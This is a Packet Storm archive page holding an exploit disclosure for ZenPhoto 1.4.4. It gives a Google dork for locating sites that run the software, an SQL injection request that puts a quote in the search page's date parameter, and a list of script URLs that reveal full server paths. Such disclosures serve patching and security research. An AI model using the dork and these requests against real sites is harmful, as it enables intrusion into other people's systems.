exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ZenPhoto 1.4.4 Path Disclosure / SQL Injection

ZenPhoto 1.4.4 Path Disclosure / SQL Injection
Posted Jan 24, 2014
Authored by KedAns-Dz

ZenPhoto version 1.4.4 suffers from path disclosure and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection, info disclosure
SHA-256 | 470b780f56364cf82baed219380d3c27f21f8fb21b23a8c4496379d034e09f39

ZenPhoto 1.4.4 Path Disclosure / SQL Injection

Change Mirror Download
 
###########################################
#-----------------------------------------#
#[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]#
#-----------------------------------------#
# *----------------------------* #
# K |....##...##..####...####....| . #
# h |....#...#........#..#...#...| A #
# a |....#..#.........#..#....#..| N #
# l |....###........##...#.....#.| S #
# E |....#.#..........#..#....#..| e #
# D |....#..#.........#..#...#...| u #
# . |....##..##...####...####....| r #
# *----------------------------* #
#-----------------------------------------#
#[ Copyright © 2014 | Dz Offenders Cr3w ]#
#-----------------------------------------#
###########################################
# >> D_x . Made In Algeria . x_Z << #
######################################################################
#
# [>] Title : ZenPhoto v1.4.4 (SQLi/Disclosure) Multiple Vulnerabilities
#
# [>] Author : KedAns-Dz
# [+] E-mail : ked-h (@hotmail.com)
# [+] FaCeb0ok : fb.me/K3d.Dz
# [+] TwiTter : @kedans
#
# [#] Platform : PHP / WebApp
# [+] Cat/Tag : SQL Injection , Multiple Full Path Disclosure
#
# [<] <3 <3 Greetings t0 Palestine <3 <3
# [>] ^_^ Greetings to 1337day Users/FAN's <3 *_* , i'm leaving 1337day
# [-] F-ck Hacking , LuV Exploiting .. Penetration-Testing rouls
#
#######################################################################
#
# [!] Description :
#
# ZenPhoto version 1.4.4 is suffer from multiple vulnerabilities
# remote attacker can use some MySQL bug in (&date=) and exploit it
# as SQL Injection ,and access to some files and get errors with the
# Full Path of this files and use it to disclosure the target full path.
#
# [!] CWE = CWE-89 , CWE-22
#
#####
# [!] Google Dork :
# intext:"Powered by zenPHOTO"
#####
# [+] Exploit (1) ' SQL Injection ' :=>
#
# - http://[target]/[path]/index.php?p=search&date='
# - http://127.0.0.1/zenphoto/index.php?p=search&date=' [SQL Injection]
#
# - p.o.c image : (http://oi41.tinypic.com/zme90m.jpg)
#
#####
# [+] Exploit (2) ' Full Path Disclosure ' :
#
# - http://127.0.0.1/zenphoto/zp-core/zp-extensions/tiny_mce.php
# - http://127.0.0.1/zenphoto/zp-core/zp-extensions/uploader_http.php
# - http://127.0.0.1/zenphoto/zp-core/zp-extensions/uploader_flash.php
# - http://127.0.0.1/zenphoto/zp-core/zp-extensions/uploader_jQuery.php
# - http://127.0.0.1/zenphoto/zp-core/utilities/refresh_database.php
# - http://127.0.0.1/zenphoto/zp-core/utilities/refresh_metadata.php
#
#######################################################################

####
# <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !>
# Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3
#---------------------------------------------------------------
# Greetings to my Homies : Indoushka , Caddy-Dz , Kalashinkov3 ,
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz , &
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &
# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day &
# =( packetstormsecurity.org * metasploit.com * OWASP & OSVDB )=
####
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close